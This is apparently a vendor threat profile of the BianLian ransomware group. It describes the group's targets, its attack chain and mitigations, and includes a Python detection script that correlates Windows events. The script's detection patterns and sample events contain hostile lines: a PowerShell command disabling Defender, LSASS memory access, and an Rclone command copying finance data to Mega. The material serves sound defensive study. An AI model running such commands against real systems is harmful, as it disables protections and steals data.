BianLian is a ransomware group known for targeting critical infrastructure sectors through sophisticated data exfiltration and extortion techniques, initially employing a double-extortion model before shifting to pure data extortion.
BianLian is a ransomware and data extortion group likely operating out of Russia, with multiple affiliates based in the same region. The group has been active since June 2022 and initially used a double-extortion model, combining data theft with file encryption. As of January 2024 it has shifted to an exfiltration-only model: it steals data and demands payment to prevent public disclosure, and no longer encrypts victims' systems. The name, taken from the Chinese face-changing opera art "bian lian", appears to have been chosen to muddy attribution rather than to indicate where the group operates.
The majority of BianLian's attacks are concentrated in the United States, which accounts for 57.8% of the attacks. Other significant targets include the United Kingdom (10.2%), Canada (6.8%), and India (4.8%). Additionally, countries like Australia, Sweden, Germany, and Austria have also been affected, albeit to a lesser extent. This distribution underscores the group's focus on developed nations with robust digital infrastructures and significant amounts of valuable data.
Source: Ransomware.live
BianLian has shown a marked preference for certain industries, with the healthcare sector experiencing the highest number of attacks, followed by manufacturing, professional and legal services, high technology, and construction. Other notable targets include transportation and logistics, wholesale and retail, financial services, and education. This pattern highlights BianLian's focus on sectors that handle sensitive and critical data, making them prime targets for extortion and disruption.
Source: Palo Alto's Unit 42
BianLian has claimed at least 508 victims, including medium to large enterprises in the financial, healthcare, and property development sectors. Its playbook of logging in with compromised RDP credentials and exfiltrating sensitive data has caused significant financial and reputational damage to the affected organizations.
Source: Ransomware.live
BianLian gains access to networks through compromised Remote Desktop Protocol (RDP) credentials, obtained via phishing or bought from initial access brokers. They also exploit vulnerabilities in public-facing applications, such as the ProxyShell chain in Microsoft Exchange Server (CVE-2021-34473, CVE-2021-34523, CVE-2021-31207).
They escalate privileges on Windows systems by exploiting vulnerabilities such as CVE-2022-37969, an elevation-of-privilege flaw in the Windows Common Log File System (CLFS) driver.
The group disables security tooling before moving on: Windows Defender is turned off via PowerShell, and the Windows Registry is modified to switch off Sophos tamper protection so the endpoint agent's services can be stopped or uninstalled. They also pack their malware with UPX to hinder static detection.
BianLian actors steal credentials by dumping Local Security Authority Subsystem Service (LSASS) memory and searching for plaintext credentials stored in files.
Using tools like Advanced Port Scanner and SharpShares, they enumerate network services, shared folders, and domain accounts to map the target’s environment.
They use RDP, PsExec, and Server Message Block (SMB) connections for lateral movement within networks.
Sensitive data is identified, compressed, and encrypted before being staged for exfiltration.
Data is exfiltrated over FTP, with the Rclone sync tool, or by uploading it to the Mega cloud storage service. Unlike in their earlier operations, they no longer encrypt endpoint data.
BianLian’s operations culminate in extortion, where they threaten to publicly leak stolen data, leveraging the victim’s fear of reputational, financial, and legal consequences to demand ransom payments.
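The attack chain above (RDP logon with valid credentials, disabling Defender or Sophos tamper protection, LSASS memory access, and an Rclone, Mega, or FTP upload) is what a detection engineer would try to stitch together across hosts. The following Python is an added example, not code from this page or from any vendor's product: it runs simplified rules over constructed Windows Security and Sysmon events and reports hosts on which several stages of the chain were seen. The event shapes (Security 4624/4688/4104, Sysmon 10/13), the registry paths, and the tool binary names are assumptions made for the example.

```python
import re
from collections import defaultdict
from dataclasses import dataclass
from typing import Dict, List, Optional, Set


@dataclass
class Event:
    """Simplified Windows event: host, acting user, event ID and a few named fields."""
    host: str
    user: str
    event_id: int          # Security log (4624, 4688, 4104) or Sysmon (10, 13) ID
    fields: Dict[str, str]


# Registry paths whose modification points at AV tamper (Sophos tamper-protection
# values and Windows Defender policy values). Assumed patterns, not an exhaustive list.
TAMPER_KEY_PATTERNS = [
    re.compile(r"sophos.*(savservice|savenabled|sedenabled)", re.I),
    re.compile(r"windows defender.*(disableantispyware|disablerealtimemonitoring)", re.I),
]
# PowerShell that switches off Defender features, e.g. Set-MpPreference -DisableRealtimeMonitoring $true
DEFENDER_DISABLE = re.compile(r"set-mppreference.*-disable\w+\s+\$?true", re.I)
# Exfiltration tooling named on the page (Rclone, Mega clients, FTP); binary names are assumptions
EXFIL_TOOLS = re.compile(r"\b(rclone|megasync|megacmd|mega-put|ftp\.exe)\b", re.I)
# Processes that legitimately open LSASS; anything else doing so deserves a look
LSASS_ALLOWLIST = {"csrss.exe", "wininit.exe", "services.exe", "msmpeng.exe", "lsass.exe"}


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(ev: Event) -> Optional[str]:
    """Map one event to a stage of the BianLian chain, or None if it is not interesting."""
    f = ev.fields
    if ev.event_id == 4624 and f.get("LogonType") == "10":
        return "initial_access"          # RemoteInteractive (RDP) logon with valid credentials
    if ev.event_id == 13 and any(p.search(f.get("TargetObject", "")) for p in TAMPER_KEY_PATTERNS):
        return "defense_evasion"         # Sysmon registry value set on an AV tamper key
    if ev.event_id == 4104 and DEFENDER_DISABLE.search(f.get("ScriptBlockText", "")):
        return "defense_evasion"         # PowerShell script block disabling Defender
    if (ev.event_id == 10
            and _basename(f.get("TargetImage", "")) == "lsass.exe"
            and _basename(f.get("SourceImage", "")) not in LSASS_ALLOWLIST):
        return "credential_access"       # Sysmon ProcessAccess: unexpected process opening LSASS
    if ev.event_id in (1, 4688) and EXFIL_TOOLS.search(f.get("CommandLine", "")):
        return "exfiltration"            # process creation of an exfiltration tool
    return None


def correlate(events: List[Event]) -> Dict[str, Set[str]]:
    """Collect the distinct chain stages observed per host."""
    stages: Dict[str, Set[str]] = defaultdict(set)
    for ev in events:
        stage = classify(ev)
        if stage:
            stages[ev.host].add(stage)
    return dict(stages)


def suspicious_hosts(events: List[Event], min_stages: int = 2) -> List[str]:
    """Hosts with at least min_stages different stages (a lone RDP logon is just noise)."""
    return sorted(h for h, s in correlate(events).items() if len(s) >= min_stages)


# Constructed sample events (not real log exports): FS01 shows the full chain,
# WS22 only a routine RDP logon followed by a benign process.
SAMPLE_EVENTS = [
    Event("FS01", "CORP\\jdoe", 4624, {"LogonType": "10", "IpAddress": "203.0.113.7"}),
    Event("FS01", "CORP\\jdoe", 4104, {"ScriptBlockText": "Set-MpPreference -DisableRealtimeMonitoring $true"}),
    Event("FS01", "CORP\\jdoe", 13, {"TargetObject": r"HKLM\SOFTWARE\WOW6432Node\Sophos\SAVService\TamperProtection\Config\SAVEnabled"}),
    Event("FS01", "CORP\\jdoe", 10, {"SourceImage": r"C:\Users\jdoe\AppData\Local\Temp\procdump64.exe",
                                     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1FFFFF"}),
    Event("FS01", "CORP\\jdoe", 4688, {"CommandLine": r"C:\Tools\rclone.exe copy D:\Finance mega:dump --transfers 8"}),
    Event("WS22", "CORP\\helpdesk", 4624, {"LogonType": "10", "IpAddress": "10.0.0.5"}),
    Event("WS22", "CORP\\helpdesk", 4688, {"CommandLine": r"C:\Windows\System32\notepad.exe"}),
]

if __name__ == "__main__":
    for host, stages in correlate(SAMPLE_EVENTS).items():
        print(host, sorted(stages))
    print("suspicious:", suspicious_hosts(SAMPLE_EVENTS))
```

The value of the correlation is in the per-host stage count rather than in any single rule: RDP logons and even LSASS access by backup or monitoring agents occur on healthy networks, but an RDP session followed on the same host by AV tampering and an Rclone launch within a short window is close to unambiguous. In production the same logic would be keyed on a time window and on the user as well as the host, and the allowlists would be tuned to the environment.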
BianLian employs various TTPs aligned with the MITRE ATT&CK framework. Some of the key TTPs include:
List of the Detections available in the Vectra AI Platform that would indicate a ransomware attack:
BianLian primarily gains initial access through compromised RDP credentials, often obtained via phishing or from initial access brokers.
They disable antivirus tools and tamper protection features using PowerShell and modify the Windows Registry to avoid detection.
BianLian targets critical infrastructure sectors in the U.S. and private enterprises in Australia, including sectors like healthcare, financial services, and property development.
BianLian exfiltrates data using FTP, Rclone, or Mega, uploading sensitive files to cloud storage services.
During 2023 BianLian moved away from encrypting victims' systems, and as of January 2024 it relies on exfiltration-based extortion, threatening to release stolen data unless paid.
They use tools like Advanced Port Scanner, SoftPerfect Network Scanner, and PingCastle to identify valuable targets within a network.
BianLian activates local administrator accounts and changes passwords to elevate privileges, facilitating further exploitation.
BianLian uses PsExec and RDP with valid credentials for lateral movement across the network.
Restrict and monitor remote access tools (above all RDP, which should not be exposed to the internet and should require multi-factor authentication), disable unnecessary services, enforce strong password policies, and apply software updates and patches promptly, in particular for internet-facing systems such as Exchange.
XDR solutions can help by providing comprehensive visibility and automated response capabilities, detecting and mitigating suspicious activities across endpoints, networks, and cloud environments.